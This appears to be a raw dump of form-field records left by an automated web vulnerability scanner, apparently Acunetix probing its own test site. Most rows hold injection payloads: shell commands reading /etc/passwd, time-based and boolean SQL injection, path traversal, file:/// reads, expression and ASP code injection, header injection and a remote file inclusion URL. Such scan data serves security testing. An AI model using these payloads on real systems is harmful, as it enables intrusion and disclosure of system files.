216 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 ${99537+100203} 1 1 1 1 1 1
217 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1
218 1 1 1
219 2017-12-08 13:46:20Z 1 1 1 4111111111111111'=sleep(4)=' 1 1 1 1 1 1 1 1 1
220 2017-12-08 13:46:20Z 1 1 1 4111111111111111 `cat /etc/passwd` 1 1 1 1 1 1 1 1
221 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 '+response.write(9294718*9241867)+' 1
222 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 SomeCustomInjectedHeader:injected_by_wvs 1 1 1
223 2017-12-08 13:46:20Z 1 1 1 file:///etc/passwd 1 1 1 1 1 1 1 1 1
224 2017-12-08 13:46:20Z 1 1 1 4111111111111111 |cat /etc/passwd# 1 1 1 1 1 1 1 1
225 2017-12-08 13:46:20Z 1 1 1 4111111111111111"=sleep(4)=" 1 1 1 1 1 1 1 1 1
226 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1e309 1 1 1 1 1 1 1 1
227 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 "+response.write(9294718*9241867)+" 1
228 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 ${100372+100363} 1 1 1
229 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1
230 1
231 2017-12-08 13:46:20Z 1 1 1 /\../\../\../\../\../\../\../etc/passwd 1 1 1 1 1 1 1 1 1
232 2017-12-08 13:46:20Z 1 1 1 4111111111111111 '"\'\");|]*{
233 1 1 1 1 1 1 1 1
234 2017-12-08 13:46:20Z 1 1 1 4111111111111111 '|'ld 1 1 1 1 1 1 1 1
235 2017-12-08 13:46:20Z 1 response.write(9312640*9221028) 1 4111111111111111 1 1 1 1 1 1 1 1 1
236 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ${99308+100288} 1
237 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1
238 1
239 2017-12-08 13:46:20Z 1 1 1 4111111111111111;select pg_sleep(4); -- 1 1 1 1 1 1 1 1 1
240 2017-12-08 13:46:20Z 1 1 1 4111111111111111';select pg_sleep(4); -- 1 1 1 1 1 1 1 1 1
241 2017-12-08 13:46:20Z 1 1 1 4111111111111111 Array 1 1 1 1 1 1 1 1
242 2017-12-08 13:46:20Z 1 1 1 4111111111111111 "|"ld 1 1 1 1 1 1 1 1
243 2017-12-08 13:46:20Z 1 1 1 WEB-INF/web.xml 1 1 1 1 1 1 1 1 1
244 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 SomeCustomInjectedHeader:injected_by_wvs 1
245 2017-12-08 13:46:20Z 1 ${99561+99428} 1 4111111111111111 1 1 1 1 1 1 1 1 1
246 2017-12-08 13:46:20Z 1 '+response.write(9312640*9221028)+' 1 4111111111111111 1 1 1 1 1 1 1 1 1
247 2017-12-08 13:46:20Z 1
248 1 4111111111111111 1 1 1 1 1 1 1 1 1
249 2017-12-08 13:46:20Z 1 "+response.write(9312640*9221028)+" 1 4111111111111111 1 1 1 1 1 1 1 1 1
250 2017-12-08 13:46:20Z 1 1 1 WEB-INF\web.xml 1 1 1 1 1 1 1 1 1
251 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
252 2017-12-08 13:46:20Z 1 1 1 4111111111111111 ;cat /etc/passwd; 1 1 1 1 1 1 1 1
253 2017-12-08 13:46:20Z 1 1 1 4111111111111111; waitfor delay '0:0:4' -- 1 1 1 1 1 1 1 1 1
254 2017-12-08 13:46:20Z 1 1 ${99328+99499} 4111111111111111 1 1 1 1 1 1 1 1 1
255 2017-12-08 13:46:20Z 1 1 1 4111111111111111 ';cat /etc/passwd;' 1 1 1 1 1 1 1 1
256 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
257 2017-12-08 13:46:20Z 1 1 response.write(9721156*9374493) 4111111111111111 1 1 1 1 1 1 1 1 1
258 2017-12-08 13:46:20Z 1 1 1 4111111111111111 ../../../../../../../../../../etc/passwd 1 1 1 1 1 1 1 1
259 2017-12-08 13:46:20Z 1
260 1 4111111111111111 1 1 1 1 1 1 1 1 1
261 2017-12-08 13:46:20Z 1 1 1 4111111111111111 ";cat /etc/passwd;" 1 1 1 1 1 1 1 1
262 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1 1 1
263 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 268435455 1 1 1 1
264 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 ${100088+99970} 1 1 1 1 1 1 1
265 2017-12-08 13:46:21Z 1 1 1 4111111111111111'; waitfor delay '0:0:4' -- 1 1 1 1 1 1 1 1 1
266 2017-12-08 13:46:21Z 1 1 '+response.write(9721156*9374493)+' 4111111111111111 1 1 1 1 1 1 1 1 1
267 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ../../../../../../../../../../etc/passwd.jpg 1 1 1 1 1 1 1 1
268 2017-12-08 13:46:21Z 1 SomeCustomInjectedHeader:injected_by_wvs 1 4111111111111111 1 1 1 1 1 1 1 1 1
269 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ||cat /etc/passwd 1 1 1 1 1 1 1 1
270 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 ${99396+100397} 1 1
271 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 h 1 1 1 1
272 2017-12-08 13:46:21Z 1 1 1 4111111111111111 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1 1 1 1 1 1
273 2017-12-08 13:46:21Z 1 1 "+response.write(9721156*9374493)+" 4111111111111111 1 1 1 1 1 1 1 1 1
274 2017-12-08 13:46:21Z 1 1 1 4111111111111111"; waitfor delay '0:0:4' -- 1 1 1 1 1 1 1 1 1
275 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 ${99525+100227} 1 1 1 1 1
276 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1 1 1
277 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 &cat /etc/passwd& 1 1 1 1
278 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 response.write(9408691*9842872) 1 1 1 1 1 1 1
279 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 .. 1 1 1 1
280 2017-12-08 13:46:21Z 1 1
281 4111111111111111 1 1 1 1 1 1 1 1 1
282 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 '&cat /etc/passwd&' 1 1 1 1
283 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
284 2017-12-08 13:46:21Z 1 1 1 4111111111111111 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1 1 1 1 1 1 1
285 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ${99883+99443}
286 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 '+response.write(9408691*9842872)+' 1 1 1 1 1 1 1
287 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 "&cat /etc/passwd&" 1 1 1 1
288 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
289 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1e309 1 1 1 1
290 2017-12-08 13:46:21Z 1 1
291 4111111111111111 1 1 1 1 1 1 1 1 1
292 2017-12-08 13:46:21Z ${99597+100382} 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
293 2017-12-08 13:46:21Z 1 1 1 4111111111111111 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1 1 1 1 1 1 1
294 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1
295
296 1 1 1 1
297 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 "+response.write(9408691*9842872)+" 1 1 1 1 1 1 1
298 2017-12-08 13:46:21Z 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1 1 1 1 1 1 1
299 2017-12-08 13:46:21Z 1 1 1 4111111111111111 -1 or 35=35 1 1 1 1 1 1 1 1
300 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 '"\'\");|]*{
301 1 1 1 1
302 2017-12-08 13:46:21Z 1 1 SomeCustomInjectedHeader:injected_by_wvs 4111111111111111 1 1 1 1 1 1 1 1 1
303 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 `cat /etc/passwd` 1 1 1 1
304 2017-12-08 13:46:21Z 1 1 1 4111111111111111 /etc/passwd 1 1 1 1 1 1 1 1
305 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 response.write(9165266*9448424) 1 1
306 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 Array 1 1 1 1
307 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 |cat /etc/passwd# 1 1 1 1
308 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1
309 1 1 1 1 1 1 1
310 2017-12-08 13:46:21Z 1 1 1 4111111111111111 -1 or 35=0 1 1 1 1 1 1 1 1
311 2017-12-08 13:46:21Z 1 1 1 1some_inexistent_file_with_long_name%00.jpg 1 1 1 1 1 1 1 1 1
312 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
313 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 '|'ld 1 1 1 1
314 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 '+response.write(9165266*9448424)+' 1 1
315 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1 1 1 1 1 1 1
316 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1
317 1 1 1 1 1 1 1
318 2017-12-08 13:46:21Z 1 1 1 4111111111111111 -1 or 35-33=2 1 1 1 1 1 1 1 1
319 2017-12-08 13:46:21Z 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1 1 1 1 1 1 1
320 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
321 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1 "+response.write(9165266*9448424)+" 1 1
322 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1 1 1 1 1 1 1
323 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 "|"ld 1 1 1 1
324 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 SomeCustomInjectedHeader:injected_by_wvs 1 1 1 1 1 1 1
325 2017-12-08 13:46:21Z 1 1 1 4111111111111111 -1' or '79'='79 1 1 1 1 1 1 1 1
326 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 268435455 1 1 1 1 1 1
327 2017-12-08 13:46:21Z 1 1 1 testasp.vulnweb.com 1 1 1 1 1 1 1 1 1
328 2017-12-08 13:46:21Z 1 1 1 4111111111111111 -1' or '79'='0 1 1 1 1 1 1 1 1
329 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 h 1 1 1 1 1 1
330 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 ;cat /etc/passwd; 1 1 1 1
331 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 response.write(9040295*9527895) 1 1 1 1 1
332 2017-12-08 13:46:21Z 1 1 1 4111111111111111 ................etc/passwd 1 1 1 1 1 1 1 1
333 2017-12-08 13:46:21Z 1 1 1 4111111111111111 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1 1 1 1 1 1
334 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1
335 1 1
336 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 ';cat /etc/passwd;' 1 1 1 1
337 2017-12-08 13:46:21Z 1 1 1 4111111111111111 -1' or '77'='77 1 1 1 1 1 1 1 1
338 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 .. 1 1 1 1 1 1
339 2017-12-08 13:46:21Z 1 1 1 4111111111111111 1 1 1 1 1 1
340 1 1
341 2017-12-08 13:46:21Z 1 1 1 4111111111111111 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1 1 1 1 1 1 1
342 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 ";cat /etc/passwd;" 1 1 1 1
343 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1some_inexistent_file_with_long_name%00.jpg 1 1 1 1 1 1 1 1
344 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 '+response.write(9040295*9527895)+' 1 1 1 1 1
345 2017-12-08 13:46:22Z 1 1 1 4111111111111111 file:///etc/passwd 1 1 1 1 1 1 1 1
346 2017-12-08 13:46:22Z 1 1 1 4111111111111111 -1" or "60"="60 1 1 1 1 1 1 1 1
347 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1e309 1 1 1 1 1 1
348 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 SomeCustomInjectedHeader:injected_by_wvs 1 1
349 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 ||cat /etc/passwd 1 1 1 1
350 2017-12-08 13:46:22Z 1 1 1 4111111111111111 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1 1 1 1 1 1
351 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 "+response.write(9040295*9527895)+" 1 1 1 1 1
352 2017-12-08 13:46:22Z 1 1 1 4111111111111111 -1" or "60"="0 1 1 1 1 1 1 1 1
353 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1
354 1 1 1 1 1
355 2017-12-08 13:46:22Z 1 1 1 4111111111111111 /\../\../\../\../\../\../\../etc/passwd 1 1 1 1 1 1 1 1
356 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 '"\'\");|]*{
357 1 1 1 1 1 1
358 2017-12-08 13:46:22Z 1 1 1 4111111111111111 -1" or "58"="58 1 1 1 1 1 1 1 1
359 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 &cat /etc/passwd& 1 1 1 1 1 1
360 2017-12-08 13:46:22Z 1 1 1 4111111111111111 testasp.vulnweb.com 1 1 1 1 1 1 1 1
361 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 response.write(9480818*9105254)
362 2017-12-08 13:46:22Z 1 1 1 4111111111111111 WEB-INF/web.xml 1 1 1 1 1 1 1 1
363 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 and sleep(4) 1 1 1 1 1 1 1 1
364 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1
365 1 1 1 1 1
366 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 Array 1 1 1 1 1 1
367 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1
368 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 '&cat /etc/passwd&' 1 1 1 1 1 1
369 2017-12-08 13:46:22Z 1 1 1 4111111111111111 WEB-INF\web.xml 1 1 1 1 1 1 1 1
370 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1 1
371 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 '+response.write(9480818*9105254)+'
372 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 "&cat /etc/passwd&" 1 1 1 1 1 1
373 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 ../../../../../../../../../../etc/passwd 1 1 1 1
374 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 SomeCustomInjectedHeader:injected_by_wvs 1 1 1 1 1
375 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
376 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1' and sleep(4)=' 1 1 1 1 1 1 1 1
377 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
378
379 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1
380 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
381 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1
382
383 1 1 1 1 1 1
384 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1some_inexistent_file_with_long_name%00.jpg 1 1 1 1
385 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1' and (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1
386 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 "+response.write(9480818*9105254)+"
387 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 268435455 1 1 1
388 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 `cat /etc/passwd` 1 1 1 1 1 1
389 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 ../../../../../../../../../../etc/passwd.jpg 1 1 1 1
390 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
391
392 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 |cat /etc/passwd# 1 1 1 1 1 1
393 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1 1
394 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 h 1 1 1
395 2017-12-08 13:46:22Z response.write(9489505*9722714) 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
396 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1" and sleep(4)=" 1 1 1 1 1 1 1 1
397 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 '|'ld 1 1 1 1 1 1
398 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 SomeCustomInjectedHeader:injected_by_wvs
399 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 .. 1 1 1
400 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 testasp.vulnweb.com 1 1 1 1
401 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1 1
402 2017-12-08 13:46:22Z
403 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
404 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1' or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1
405 2017-12-08 13:46:22Z '+response.write(9489505*9722714)+' 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
406 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 "|"ld 1 1 1 1 1 1
407 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1
408 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 1e309 1 1 1
409 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1" or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1
410 2017-12-08 13:46:22Z "+response.write(9489505*9722714)+" 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
411 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1 1 1 1
412 2017-12-08 13:46:22Z
413 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
414 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1 1 1
415 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 '"\'\");|]*{
416 1 1 1
417 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 ;cat /etc/passwd; 1 1 1 1 1 1
418 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1 1 1 Array 1 1 1
419 2017-12-08 13:46:22Z 1 1 1 4111111111111111 1 1 1some_inexistent_file_with_long_name%00.jpg 1 1 1 1 1 1
420 2017-12-08 13:46:23Z 1 1 1 4111111111111111&n930741=v925265 1 1 1 1 1 1 1 1 1
421 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1 1 1
422 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1'=sleep(4)=' 1 1 1 1 1 1 1 1
423 2017-12-08 13:46:23Z SomeCustomInjectedHeader:injected_by_wvs 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
424 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
425 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 ';cat /etc/passwd;' 1 1 1 1 1 1
426 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1 1 1 1
427 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 /etc/passwd 1 1 1 1
428 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1"=sleep(4)=" 1 1 1 1 1 1 1 1
429 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1&n903082=v974651 1 1 1 1 1 1 1 1
430 2017-12-08 13:46:23Z 1 1 1 ) 1 1 1 1 1 1 1 1 1
431 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
432 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1&n988751=v997063 1 1 1 1
433 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 testasp.vulnweb.com 1 1 1 1 1 1
434 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1 1 1
435 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 ";cat /etc/passwd;" 1 1 1 1 1 1
436 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1;select pg_sleep(4); -- 1 1 1 1 1 1 1 1
437 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1&n912516=v985297 1 1 1 1 1 1
438 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1
439 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1 1 1
440 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 268435455 1
441 2017-12-08 13:46:23Z 1 1 1 !(()&&!|*|*| 1 1 1 1 1 1 1 1 1
442 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 ................etc/passwd 1 1 1 1
443 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1some_inexistent_file_with_long_name%00.jpg 1 1 1
444 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1';select pg_sleep(4); -- 1 1 1 1 1 1 1 1
445 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1&n977461=v978601 1 1 1
446 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 ||cat /etc/passwd 1 1 1 1 1 1
447 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1 1 1
448 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 h 1
449 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1; waitfor delay '0:0:4' -- 1 1 1 1 1 1 1 1
450 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1
451 2017-12-08 13:46:23Z 1 1 1 ^(#$!@#$)(()))****** 1 1 1 1 1 1 1 1 1
452 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 file:///etc/passwd 1 1 1 1
453 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1&n966405=v906505 1
454 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 .. 1
455 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1'; waitfor delay '0:0:4' -- 1 1 1 1 1 1 1 1
456 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 &cat /etc/passwd& 1 1 1
